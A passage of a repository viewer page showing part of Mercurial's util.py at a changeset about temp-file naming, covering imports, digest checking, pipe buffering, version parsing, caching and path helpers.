##// END OF EJS Templates
util: use ~ as a suffix for a temp file in the same directory as a source file...
Michael Bolin -
r34004:2ad02863 default
parent child Browse files
Show More
@@ -1,3773 +1,3773 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import os
30 30 import platform as pyplatform
31 31 import re as remod
32 32 import shutil
33 33 import signal
34 34 import socket
35 35 import stat
36 36 import string
37 37 import subprocess
38 38 import sys
39 39 import tempfile
40 40 import textwrap
41 41 import time
42 42 import traceback
43 43 import warnings
44 44 import zlib
45 45
46 46 from . import (
47 47 encoding,
48 48 error,
49 49 i18n,
50 50 policy,
51 51 pycompat,
52 52 )
53 53
54 54 base85 = policy.importmod(r'base85')
55 55 osutil = policy.importmod(r'osutil')
56 56 parsers = policy.importmod(r'parsers')
57 57
58 58 b85decode = base85.b85decode
59 59 b85encode = base85.b85encode
60 60
61 61 cookielib = pycompat.cookielib
62 62 empty = pycompat.empty
63 63 httplib = pycompat.httplib
64 64 httpserver = pycompat.httpserver
65 65 pickle = pycompat.pickle
66 66 queue = pycompat.queue
67 67 socketserver = pycompat.socketserver
68 68 stderr = pycompat.stderr
69 69 stdin = pycompat.stdin
70 70 stdout = pycompat.stdout
71 71 stringio = pycompat.stringio
72 72 urlerr = pycompat.urlerr
73 73 urlreq = pycompat.urlreq
74 74 xmlrpclib = pycompat.xmlrpclib
75 75
76 76 # workaround for win32mbcs
77 77 _filenamebytestr = pycompat.bytestr
78 78
79 79 def isatty(fp):
80 80 try:
81 81 return fp.isatty()
82 82 except AttributeError:
83 83 return False
84 84
85 85 # glibc determines buffering on first write to stdout - if we replace a TTY
86 86 # destined stdout with a pipe destined stdout (e.g. pager), we want line
87 87 # buffering
88 88 if isatty(stdout):
89 89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90 90
91 91 if pycompat.osname == 'nt':
92 92 from . import windows as platform
93 93 stdout = platform.winstdout(stdout)
94 94 else:
95 95 from . import posix as platform
96 96
97 97 _ = i18n._
98 98
99 99 bindunixsocket = platform.bindunixsocket
100 100 cachestat = platform.cachestat
101 101 checkexec = platform.checkexec
102 102 checklink = platform.checklink
103 103 copymode = platform.copymode
104 104 executablepath = platform.executablepath
105 105 expandglobs = platform.expandglobs
106 106 explainexit = platform.explainexit
107 107 findexe = platform.findexe
108 108 gethgcmd = platform.gethgcmd
109 109 getuser = platform.getuser
110 110 getpid = os.getpid
111 111 groupmembers = platform.groupmembers
112 112 groupname = platform.groupname
113 113 hidewindow = platform.hidewindow
114 114 isexec = platform.isexec
115 115 isowner = platform.isowner
116 116 listdir = osutil.listdir
117 117 localpath = platform.localpath
118 118 lookupreg = platform.lookupreg
119 119 makedir = platform.makedir
120 120 nlinks = platform.nlinks
121 121 normpath = platform.normpath
122 122 normcase = platform.normcase
123 123 normcasespec = platform.normcasespec
124 124 normcasefallback = platform.normcasefallback
125 125 openhardlinks = platform.openhardlinks
126 126 oslink = platform.oslink
127 127 parsepatchoutput = platform.parsepatchoutput
128 128 pconvert = platform.pconvert
129 129 poll = platform.poll
130 130 popen = platform.popen
131 131 posixfile = platform.posixfile
132 132 quotecommand = platform.quotecommand
133 133 readpipe = platform.readpipe
134 134 rename = platform.rename
135 135 removedirs = platform.removedirs
136 136 samedevice = platform.samedevice
137 137 samefile = platform.samefile
138 138 samestat = platform.samestat
139 139 setbinary = platform.setbinary
140 140 setflags = platform.setflags
141 141 setsignalhandler = platform.setsignalhandler
142 142 shellquote = platform.shellquote
143 143 spawndetached = platform.spawndetached
144 144 split = platform.split
145 145 sshargs = platform.sshargs
146 146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 147 statisexec = platform.statisexec
148 148 statislink = platform.statislink
149 149 testpid = platform.testpid
150 150 umask = platform.umask
151 151 unlink = platform.unlink
152 152 username = platform.username
153 153
154 154 try:
155 155 recvfds = osutil.recvfds
156 156 except AttributeError:
157 157 pass
158 158 try:
159 159 setprocname = osutil.setprocname
160 160 except AttributeError:
161 161 pass
162 162
163 163 # Python compatibility
164 164
165 165 _notset = object()
166 166
167 167 # disable Python's problematic floating point timestamps (issue4836)
168 168 # (Python hypocritically says you shouldn't change this behavior in
169 169 # libraries, and sure enough Mercurial is not a library.)
170 170 os.stat_float_times(False)
171 171
172 172 def safehasattr(thing, attr):
173 173 return getattr(thing, attr, _notset) is not _notset
174 174
175 175 def bytesinput(fin, fout, *args, **kwargs):
176 176 sin, sout = sys.stdin, sys.stdout
177 177 try:
178 178 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
179 179 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
180 180 finally:
181 181 sys.stdin, sys.stdout = sin, sout
182 182
183 183 def bitsfrom(container):
184 184 bits = 0
185 185 for bit in container:
186 186 bits |= bit
187 187 return bits
188 188
189 189 # python 2.6 still have deprecation warning enabled by default. We do not want
190 190 # to display anything to standard user so detect if we are running test and
191 191 # only use python deprecation warning in this case.
192 192 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
193 193 if _dowarn:
194 194 # explicitly unfilter our warning for python 2.7
195 195 #
196 196 # The option of setting PYTHONWARNINGS in the test runner was investigated.
197 197 # However, module name set through PYTHONWARNINGS was exactly matched, so
198 198 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
199 199 # makes the whole PYTHONWARNINGS thing useless for our usecase.
200 200 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
201 201 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
202 202 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
203 203
204 204 def nouideprecwarn(msg, version, stacklevel=1):
205 205 """Issue an python native deprecation warning
206 206
207 207 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
208 208 """
209 209 if _dowarn:
210 210 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
211 211 " update your code.)") % version
212 212 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
213 213
214 214 DIGESTS = {
215 215 'md5': hashlib.md5,
216 216 'sha1': hashlib.sha1,
217 217 'sha512': hashlib.sha512,
218 218 }
219 219 # List of digest types from strongest to weakest
220 220 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
221 221
222 222 for k in DIGESTS_BY_STRENGTH:
223 223 assert k in DIGESTS
224 224
225 225 class digester(object):
226 226 """helper to compute digests.
227 227
228 228 This helper can be used to compute one or more digests given their name.
229 229
230 230 >>> d = digester(['md5', 'sha1'])
231 231 >>> d.update('foo')
232 232 >>> [k for k in sorted(d)]
233 233 ['md5', 'sha1']
234 234 >>> d['md5']
235 235 'acbd18db4cc2f85cedef654fccc4a4d8'
236 236 >>> d['sha1']
237 237 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
238 238 >>> digester.preferred(['md5', 'sha1'])
239 239 'sha1'
240 240 """
241 241
242 242 def __init__(self, digests, s=''):
243 243 self._hashes = {}
244 244 for k in digests:
245 245 if k not in DIGESTS:
246 246 raise Abort(_('unknown digest type: %s') % k)
247 247 self._hashes[k] = DIGESTS[k]()
248 248 if s:
249 249 self.update(s)
250 250
251 251 def update(self, data):
252 252 for h in self._hashes.values():
253 253 h.update(data)
254 254
255 255 def __getitem__(self, key):
256 256 if key not in DIGESTS:
257 257 raise Abort(_('unknown digest type: %s') % k)
258 258 return self._hashes[key].hexdigest()
259 259
260 260 def __iter__(self):
261 261 return iter(self._hashes)
262 262
263 263 @staticmethod
264 264 def preferred(supported):
265 265 """returns the strongest digest type in both supported and DIGESTS."""
266 266
267 267 for k in DIGESTS_BY_STRENGTH:
268 268 if k in supported:
269 269 return k
270 270 return None
271 271
272 272 class digestchecker(object):
273 273 """file handle wrapper that additionally checks content against a given
274 274 size and digests.
275 275
276 276 d = digestchecker(fh, size, {'md5': '...'})
277 277
278 278 When multiple digests are given, all of them are validated.
279 279 """
280 280
281 281 def __init__(self, fh, size, digests):
282 282 self._fh = fh
283 283 self._size = size
284 284 self._got = 0
285 285 self._digests = dict(digests)
286 286 self._digester = digester(self._digests.keys())
287 287
288 288 def read(self, length=-1):
289 289 content = self._fh.read(length)
290 290 self._digester.update(content)
291 291 self._got += len(content)
292 292 return content
293 293
294 294 def validate(self):
295 295 if self._size != self._got:
296 296 raise Abort(_('size mismatch: expected %d, got %d') %
297 297 (self._size, self._got))
298 298 for k, v in self._digests.items():
299 299 if v != self._digester[k]:
300 300 # i18n: first parameter is a digest name
301 301 raise Abort(_('%s mismatch: expected %s, got %s') %
302 302 (k, v, self._digester[k]))
303 303
304 304 try:
305 305 buffer = buffer
306 306 except NameError:
307 307 def buffer(sliceable, offset=0, length=None):
308 308 if length is not None:
309 309 return memoryview(sliceable)[offset:offset + length]
310 310 return memoryview(sliceable)[offset:]
311 311
312 312 closefds = pycompat.osname == 'posix'
313 313
314 314 _chunksize = 4096
315 315
316 316 class bufferedinputpipe(object):
317 317 """a manually buffered input pipe
318 318
319 319 Python will not let us use buffered IO and lazy reading with 'polling' at
320 320 the same time. We cannot probe the buffer state and select will not detect
321 321 that data are ready to read if they are already buffered.
322 322
323 323 This class let us work around that by implementing its own buffering
324 324 (allowing efficient readline) while offering a way to know if the buffer is
325 325 empty from the output (allowing collaboration of the buffer with polling).
326 326
327 327 This class lives in the 'util' module because it makes use of the 'os'
328 328 module from the python stdlib.
329 329 """
330 330
331 331 def __init__(self, input):
332 332 self._input = input
333 333 self._buffer = []
334 334 self._eof = False
335 335 self._lenbuf = 0
336 336
337 337 @property
338 338 def hasbuffer(self):
339 339 """True is any data is currently buffered
340 340
341 341 This will be used externally a pre-step for polling IO. If there is
342 342 already data then no polling should be set in place."""
343 343 return bool(self._buffer)
344 344
345 345 @property
346 346 def closed(self):
347 347 return self._input.closed
348 348
349 349 def fileno(self):
350 350 return self._input.fileno()
351 351
352 352 def close(self):
353 353 return self._input.close()
354 354
355 355 def read(self, size):
356 356 while (not self._eof) and (self._lenbuf < size):
357 357 self._fillbuffer()
358 358 return self._frombuffer(size)
359 359
360 360 def readline(self, *args, **kwargs):
361 361 if 1 < len(self._buffer):
362 362 # this should not happen because both read and readline end with a
363 363 # _frombuffer call that collapse it.
364 364 self._buffer = [''.join(self._buffer)]
365 365 self._lenbuf = len(self._buffer[0])
366 366 lfi = -1
367 367 if self._buffer:
368 368 lfi = self._buffer[-1].find('\n')
369 369 while (not self._eof) and lfi < 0:
370 370 self._fillbuffer()
371 371 if self._buffer:
372 372 lfi = self._buffer[-1].find('\n')
373 373 size = lfi + 1
374 374 if lfi < 0: # end of file
375 375 size = self._lenbuf
376 376 elif 1 < len(self._buffer):
377 377 # we need to take previous chunks into account
378 378 size += self._lenbuf - len(self._buffer[-1])
379 379 return self._frombuffer(size)
380 380
381 381 def _frombuffer(self, size):
382 382 """return at most 'size' data from the buffer
383 383
384 384 The data are removed from the buffer."""
385 385 if size == 0 or not self._buffer:
386 386 return ''
387 387 buf = self._buffer[0]
388 388 if 1 < len(self._buffer):
389 389 buf = ''.join(self._buffer)
390 390
391 391 data = buf[:size]
392 392 buf = buf[len(data):]
393 393 if buf:
394 394 self._buffer = [buf]
395 395 self._lenbuf = len(buf)
396 396 else:
397 397 self._buffer = []
398 398 self._lenbuf = 0
399 399 return data
400 400
401 401 def _fillbuffer(self):
402 402 """read data to the buffer"""
403 403 data = os.read(self._input.fileno(), _chunksize)
404 404 if not data:
405 405 self._eof = True
406 406 else:
407 407 self._lenbuf += len(data)
408 408 self._buffer.append(data)
409 409
410 410 def popen2(cmd, env=None, newlines=False):
411 411 # Setting bufsize to -1 lets the system decide the buffer size.
412 412 # The default for bufsize is 0, meaning unbuffered. This leads to
413 413 # poor performance on Mac OS X: http://bugs.python.org/issue4194
414 414 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
415 415 close_fds=closefds,
416 416 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
417 417 universal_newlines=newlines,
418 418 env=env)
419 419 return p.stdin, p.stdout
420 420
421 421 def popen3(cmd, env=None, newlines=False):
422 422 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
423 423 return stdin, stdout, stderr
424 424
425 425 def popen4(cmd, env=None, newlines=False, bufsize=-1):
426 426 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
427 427 close_fds=closefds,
428 428 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
429 429 stderr=subprocess.PIPE,
430 430 universal_newlines=newlines,
431 431 env=env)
432 432 return p.stdin, p.stdout, p.stderr, p
433 433
434 434 def version():
435 435 """Return version information if available."""
436 436 try:
437 437 from . import __version__
438 438 return __version__.version
439 439 except ImportError:
440 440 return 'unknown'
441 441
442 442 def versiontuple(v=None, n=4):
443 443 """Parses a Mercurial version string into an N-tuple.
444 444
445 445 The version string to be parsed is specified with the ``v`` argument.
446 446 If it isn't defined, the current Mercurial version string will be parsed.
447 447
448 448 ``n`` can be 2, 3, or 4. Here is how some version strings map to
449 449 returned values:
450 450
451 451 >>> v = '3.6.1+190-df9b73d2d444'
452 452 >>> versiontuple(v, 2)
453 453 (3, 6)
454 454 >>> versiontuple(v, 3)
455 455 (3, 6, 1)
456 456 >>> versiontuple(v, 4)
457 457 (3, 6, 1, '190-df9b73d2d444')
458 458
459 459 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
460 460 (3, 6, 1, '190-df9b73d2d444+20151118')
461 461
462 462 >>> v = '3.6'
463 463 >>> versiontuple(v, 2)
464 464 (3, 6)
465 465 >>> versiontuple(v, 3)
466 466 (3, 6, None)
467 467 >>> versiontuple(v, 4)
468 468 (3, 6, None, None)
469 469
470 470 >>> v = '3.9-rc'
471 471 >>> versiontuple(v, 2)
472 472 (3, 9)
473 473 >>> versiontuple(v, 3)
474 474 (3, 9, None)
475 475 >>> versiontuple(v, 4)
476 476 (3, 9, None, 'rc')
477 477
478 478 >>> v = '3.9-rc+2-02a8fea4289b'
479 479 >>> versiontuple(v, 2)
480 480 (3, 9)
481 481 >>> versiontuple(v, 3)
482 482 (3, 9, None)
483 483 >>> versiontuple(v, 4)
484 484 (3, 9, None, 'rc+2-02a8fea4289b')
485 485 """
486 486 if not v:
487 487 v = version()
488 488 parts = remod.split('[\+-]', v, 1)
489 489 if len(parts) == 1:
490 490 vparts, extra = parts[0], None
491 491 else:
492 492 vparts, extra = parts
493 493
494 494 vints = []
495 495 for i in vparts.split('.'):
496 496 try:
497 497 vints.append(int(i))
498 498 except ValueError:
499 499 break
500 500 # (3, 6) -> (3, 6, None)
501 501 while len(vints) < 3:
502 502 vints.append(None)
503 503
504 504 if n == 2:
505 505 return (vints[0], vints[1])
506 506 if n == 3:
507 507 return (vints[0], vints[1], vints[2])
508 508 if n == 4:
509 509 return (vints[0], vints[1], vints[2], extra)
510 510
511 511 # used by parsedate
512 512 defaultdateformats = (
513 513 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
514 514 '%Y-%m-%dT%H:%M', # without seconds
515 515 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
516 516 '%Y-%m-%dT%H%M', # without seconds
517 517 '%Y-%m-%d %H:%M:%S', # our common legal variant
518 518 '%Y-%m-%d %H:%M', # without seconds
519 519 '%Y-%m-%d %H%M%S', # without :
520 520 '%Y-%m-%d %H%M', # without seconds
521 521 '%Y-%m-%d %I:%M:%S%p',
522 522 '%Y-%m-%d %H:%M',
523 523 '%Y-%m-%d %I:%M%p',
524 524 '%Y-%m-%d',
525 525 '%m-%d',
526 526 '%m/%d',
527 527 '%m/%d/%y',
528 528 '%m/%d/%Y',
529 529 '%a %b %d %H:%M:%S %Y',
530 530 '%a %b %d %I:%M:%S%p %Y',
531 531 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
532 532 '%b %d %H:%M:%S %Y',
533 533 '%b %d %I:%M:%S%p %Y',
534 534 '%b %d %H:%M:%S',
535 535 '%b %d %I:%M:%S%p',
536 536 '%b %d %H:%M',
537 537 '%b %d %I:%M%p',
538 538 '%b %d %Y',
539 539 '%b %d',
540 540 '%H:%M:%S',
541 541 '%I:%M:%S%p',
542 542 '%H:%M',
543 543 '%I:%M%p',
544 544 )
545 545
546 546 extendeddateformats = defaultdateformats + (
547 547 "%Y",
548 548 "%Y-%m",
549 549 "%b",
550 550 "%b %Y",
551 551 )
552 552
553 553 def cachefunc(func):
554 554 '''cache the result of function calls'''
555 555 # XXX doesn't handle keywords args
556 556 if func.__code__.co_argcount == 0:
557 557 cache = []
558 558 def f():
559 559 if len(cache) == 0:
560 560 cache.append(func())
561 561 return cache[0]
562 562 return f
563 563 cache = {}
564 564 if func.__code__.co_argcount == 1:
565 565 # we gain a small amount of time because
566 566 # we don't need to pack/unpack the list
567 567 def f(arg):
568 568 if arg not in cache:
569 569 cache[arg] = func(arg)
570 570 return cache[arg]
571 571 else:
572 572 def f(*args):
573 573 if args not in cache:
574 574 cache[args] = func(*args)
575 575 return cache[args]
576 576
577 577 return f
578 578
579 579 class sortdict(collections.OrderedDict):
580 580 '''a simple sorted dictionary
581 581
582 582 >>> d1 = sortdict([('a', 0), ('b', 1)])
583 583 >>> d2 = d1.copy()
584 584 >>> d2
585 585 sortdict([('a', 0), ('b', 1)])
586 586 >>> d2.update([('a', 2)])
587 587 >>> d2.keys() # should still be in last-set order
588 588 ['b', 'a']
589 589 '''
590 590
591 591 def __setitem__(self, key, value):
592 592 if key in self:
593 593 del self[key]
594 594 super(sortdict, self).__setitem__(key, value)
595 595
596 596 if pycompat.ispypy:
597 597 # __setitem__() isn't called as of PyPy 5.8.0
598 598 def update(self, src):
599 599 if isinstance(src, dict):
600 600 src = src.iteritems()
601 601 for k, v in src:
602 602 self[k] = v
603 603
604 604 class transactional(object):
605 605 """Base class for making a transactional type into a context manager."""
606 606 __metaclass__ = abc.ABCMeta
607 607
608 608 @abc.abstractmethod
609 609 def close(self):
610 610 """Successfully closes the transaction."""
611 611
612 612 @abc.abstractmethod
613 613 def release(self):
614 614 """Marks the end of the transaction.
615 615
616 616 If the transaction has not been closed, it will be aborted.
617 617 """
618 618
619 619 def __enter__(self):
620 620 return self
621 621
622 622 def __exit__(self, exc_type, exc_val, exc_tb):
623 623 try:
624 624 if exc_type is None:
625 625 self.close()
626 626 finally:
627 627 self.release()
628 628
629 629 @contextlib.contextmanager
630 630 def acceptintervention(tr=None):
631 631 """A context manager that closes the transaction on InterventionRequired
632 632
633 633 If no transaction was provided, this simply runs the body and returns
634 634 """
635 635 if not tr:
636 636 yield
637 637 return
638 638 try:
639 639 yield
640 640 tr.close()
641 641 except error.InterventionRequired:
642 642 tr.close()
643 643 raise
644 644 finally:
645 645 tr.release()
646 646
647 647 @contextlib.contextmanager
648 648 def nullcontextmanager():
649 649 yield
650 650
651 651 class _lrucachenode(object):
652 652 """A node in a doubly linked list.
653 653
654 654 Holds a reference to nodes on either side as well as a key-value
655 655 pair for the dictionary entry.
656 656 """
657 657 __slots__ = (u'next', u'prev', u'key', u'value')
658 658
659 659 def __init__(self):
660 660 self.next = None
661 661 self.prev = None
662 662
663 663 self.key = _notset
664 664 self.value = None
665 665
666 666 def markempty(self):
667 667 """Mark the node as emptied."""
668 668 self.key = _notset
669 669
670 670 class lrucachedict(object):
671 671 """Dict that caches most recent accesses and sets.
672 672
673 673 The dict consists of an actual backing dict - indexed by original
674 674 key - and a doubly linked circular list defining the order of entries in
675 675 the cache.
676 676
677 677 The head node is the newest entry in the cache. If the cache is full,
678 678 we recycle head.prev and make it the new head. Cache accesses result in
679 679 the node being moved to before the existing head and being marked as the
680 680 new head node.
681 681 """
682 682 def __init__(self, max):
683 683 self._cache = {}
684 684
685 685 self._head = head = _lrucachenode()
686 686 head.prev = head
687 687 head.next = head
688 688 self._size = 1
689 689 self._capacity = max
690 690
691 691 def __len__(self):
692 692 return len(self._cache)
693 693
694 694 def __contains__(self, k):
695 695 return k in self._cache
696 696
697 697 def __iter__(self):
698 698 # We don't have to iterate in cache order, but why not.
699 699 n = self._head
700 700 for i in range(len(self._cache)):
701 701 yield n.key
702 702 n = n.next
703 703
704 704 def __getitem__(self, k):
705 705 node = self._cache[k]
706 706 self._movetohead(node)
707 707 return node.value
708 708
709 709 def __setitem__(self, k, v):
710 710 node = self._cache.get(k)
711 711 # Replace existing value and mark as newest.
712 712 if node is not None:
713 713 node.value = v
714 714 self._movetohead(node)
715 715 return
716 716
717 717 if self._size < self._capacity:
718 718 node = self._addcapacity()
719 719 else:
720 720 # Grab the last/oldest item.
721 721 node = self._head.prev
722 722
723 723 # At capacity. Kill the old entry.
724 724 if node.key is not _notset:
725 725 del self._cache[node.key]
726 726
727 727 node.key = k
728 728 node.value = v
729 729 self._cache[k] = node
730 730 # And mark it as newest entry. No need to adjust order since it
731 731 # is already self._head.prev.
732 732 self._head = node
733 733
734 734 def __delitem__(self, k):
735 735 node = self._cache.pop(k)
736 736 node.markempty()
737 737
738 738 # Temporarily mark as newest item before re-adjusting head to make
739 739 # this node the oldest item.
740 740 self._movetohead(node)
741 741 self._head = node.next
742 742
743 743 # Additional dict methods.
744 744
745 745 def get(self, k, default=None):
746 746 try:
747 747 return self._cache[k].value
748 748 except KeyError:
749 749 return default
750 750
751 751 def clear(self):
752 752 n = self._head
753 753 while n.key is not _notset:
754 754 n.markempty()
755 755 n = n.next
756 756
757 757 self._cache.clear()
758 758
759 759 def copy(self):
760 760 result = lrucachedict(self._capacity)
761 761 n = self._head.prev
762 762 # Iterate in oldest-to-newest order, so the copy has the right ordering
763 763 for i in range(len(self._cache)):
764 764 result[n.key] = n.value
765 765 n = n.prev
766 766 return result
767 767
768 768 def _movetohead(self, node):
769 769 """Mark a node as the newest, making it the new head.
770 770
771 771 When a node is accessed, it becomes the freshest entry in the LRU
772 772 list, which is denoted by self._head.
773 773
774 774 Visually, let's make ``N`` the new head node (* denotes head):
775 775
776 776 previous/oldest <-> head <-> next/next newest
777 777
778 778 ----<->--- A* ---<->-----
779 779 | |
780 780 E <-> D <-> N <-> C <-> B
781 781
782 782 To:
783 783
784 784 ----<->--- N* ---<->-----
785 785 | |
786 786 E <-> D <-> C <-> B <-> A
787 787
788 788 This requires the following moves:
789 789
790 790 C.next = D (node.prev.next = node.next)
791 791 D.prev = C (node.next.prev = node.prev)
792 792 E.next = N (head.prev.next = node)
793 793 N.prev = E (node.prev = head.prev)
794 794 N.next = A (node.next = head)
795 795 A.prev = N (head.prev = node)
796 796 """
797 797 head = self._head
798 798 # C.next = D
799 799 node.prev.next = node.next
800 800 # D.prev = C
801 801 node.next.prev = node.prev
802 802 # N.prev = E
803 803 node.prev = head.prev
804 804 # N.next = A
805 805 # It is tempting to do just "head" here, however if node is
806 806 # adjacent to head, this will do bad things.
807 807 node.next = head.prev.next
808 808 # E.next = N
809 809 node.next.prev = node
810 810 # A.prev = N
811 811 node.prev.next = node
812 812
813 813 self._head = node
814 814
815 815 def _addcapacity(self):
816 816 """Add a node to the circular linked list.
817 817
818 818 The new node is inserted before the head node.
819 819 """
820 820 head = self._head
821 821 node = _lrucachenode()
822 822 head.prev.next = node
823 823 node.prev = head.prev
824 824 node.next = head
825 825 head.prev = node
826 826 self._size += 1
827 827 return node
828 828
829 829 def lrucachefunc(func):
830 830 '''cache most recent results of function calls'''
831 831 cache = {}
832 832 order = collections.deque()
833 833 if func.__code__.co_argcount == 1:
834 834 def f(arg):
835 835 if arg not in cache:
836 836 if len(cache) > 20:
837 837 del cache[order.popleft()]
838 838 cache[arg] = func(arg)
839 839 else:
840 840 order.remove(arg)
841 841 order.append(arg)
842 842 return cache[arg]
843 843 else:
844 844 def f(*args):
845 845 if args not in cache:
846 846 if len(cache) > 20:
847 847 del cache[order.popleft()]
848 848 cache[args] = func(*args)
849 849 else:
850 850 order.remove(args)
851 851 order.append(args)
852 852 return cache[args]
853 853
854 854 return f
855 855
856 856 class propertycache(object):
857 857 def __init__(self, func):
858 858 self.func = func
859 859 self.name = func.__name__
860 860 def __get__(self, obj, type=None):
861 861 result = self.func(obj)
862 862 self.cachevalue(obj, result)
863 863 return result
864 864
865 865 def cachevalue(self, obj, value):
866 866 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
867 867 obj.__dict__[self.name] = value
868 868
869 869 def pipefilter(s, cmd):
870 870 '''filter string S through command CMD, returning its output'''
871 871 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
872 872 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
873 873 pout, perr = p.communicate(s)
874 874 return pout
875 875
876 876 def tempfilter(s, cmd):
877 877 '''filter string S through a pair of temporary files with CMD.
878 878 CMD is used as a template to create the real command to be run,
879 879 with the strings INFILE and OUTFILE replaced by the real names of
880 880 the temporary files generated.'''
881 881 inname, outname = None, None
882 882 try:
883 883 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
884 884 fp = os.fdopen(infd, pycompat.sysstr('wb'))
885 885 fp.write(s)
886 886 fp.close()
887 887 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
888 888 os.close(outfd)
889 889 cmd = cmd.replace('INFILE', inname)
890 890 cmd = cmd.replace('OUTFILE', outname)
891 891 code = os.system(cmd)
892 892 if pycompat.sysplatform == 'OpenVMS' and code & 1:
893 893 code = 0
894 894 if code:
895 895 raise Abort(_("command '%s' failed: %s") %
896 896 (cmd, explainexit(code)))
897 897 return readfile(outname)
898 898 finally:
899 899 try:
900 900 if inname:
901 901 os.unlink(inname)
902 902 except OSError:
903 903 pass
904 904 try:
905 905 if outname:
906 906 os.unlink(outname)
907 907 except OSError:
908 908 pass
909 909
910 910 filtertable = {
911 911 'tempfile:': tempfilter,
912 912 'pipe:': pipefilter,
913 913 }
914 914
915 915 def filter(s, cmd):
916 916 "filter a string through a command that transforms its input to its output"
917 917 for name, fn in filtertable.iteritems():
918 918 if cmd.startswith(name):
919 919 return fn(s, cmd[len(name):].lstrip())
920 920 return pipefilter(s, cmd)
921 921
922 922 def binary(s):
923 923 """return true if a string is binary data"""
924 924 return bool(s and '\0' in s)
925 925
926 926 def increasingchunks(source, min=1024, max=65536):
927 927 '''return no less than min bytes per chunk while data remains,
928 928 doubling min after each chunk until it reaches max'''
929 929 def log2(x):
930 930 if not x:
931 931 return 0
932 932 i = 0
933 933 while x:
934 934 x >>= 1
935 935 i += 1
936 936 return i - 1
937 937
938 938 buf = []
939 939 blen = 0
940 940 for chunk in source:
941 941 buf.append(chunk)
942 942 blen += len(chunk)
943 943 if blen >= min:
944 944 if min < max:
945 945 min = min << 1
946 946 nmin = 1 << log2(blen)
947 947 if nmin > min:
948 948 min = nmin
949 949 if min > max:
950 950 min = max
951 951 yield ''.join(buf)
952 952 blen = 0
953 953 buf = []
954 954 if buf:
955 955 yield ''.join(buf)
956 956
957 957 Abort = error.Abort
958 958
959 959 def always(fn):
960 960 return True
961 961
962 962 def never(fn):
963 963 return False
964 964
965 965 def nogc(func):
966 966 """disable garbage collector
967 967
968 968 Python's garbage collector triggers a GC each time a certain number of
969 969 container objects (the number being defined by gc.get_threshold()) are
970 970 allocated even when marked not to be tracked by the collector. Tracking has
971 971 no effect on when GCs are triggered, only on what objects the GC looks
972 972 into. As a workaround, disable GC while building complex (huge)
973 973 containers.
974 974
975 975 This garbage collector issue have been fixed in 2.7. But it still affect
976 976 CPython's performance.
977 977 """
978 978 def wrapper(*args, **kwargs):
979 979 gcenabled = gc.isenabled()
980 980 gc.disable()
981 981 try:
982 982 return func(*args, **kwargs)
983 983 finally:
984 984 if gcenabled:
985 985 gc.enable()
986 986 return wrapper
987 987
988 988 if pycompat.ispypy:
989 989 # PyPy runs slower with gc disabled
990 990 nogc = lambda x: x
991 991
992 992 def pathto(root, n1, n2):
993 993 '''return the relative path from one place to another.
994 994 root should use os.sep to separate directories
995 995 n1 should use os.sep to separate directories
996 996 n2 should use "/" to separate directories
997 997 returns an os.sep-separated path.
998 998
999 999 If n1 is a relative path, it's assumed it's
1000 1000 relative to root.
1001 1001 n2 should always be relative to root.
1002 1002 '''
1003 1003 if not n1:
1004 1004 return localpath(n2)
1005 1005 if os.path.isabs(n1):
1006 1006 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1007 1007 return os.path.join(root, localpath(n2))
1008 1008 n2 = '/'.join((pconvert(root), n2))
1009 1009 a, b = splitpath(n1), n2.split('/')
1010 1010 a.reverse()
1011 1011 b.reverse()
1012 1012 while a and b and a[-1] == b[-1]:
1013 1013 a.pop()
1014 1014 b.pop()
1015 1015 b.reverse()
1016 1016 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1017 1017
1018 1018 def mainfrozen():
1019 1019 """return True if we are a frozen executable.
1020 1020
1021 1021 The code supports py2exe (most common, Windows only) and tools/freeze
1022 1022 (portable, not much used).
1023 1023 """
1024 1024 return (safehasattr(sys, "frozen") or # new py2exe
1025 1025 safehasattr(sys, "importers") or # old py2exe
1026 1026 imp.is_frozen(u"__main__")) # tools/freeze
1027 1027
1028 1028 # the location of data files matching the source code
1029 1029 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
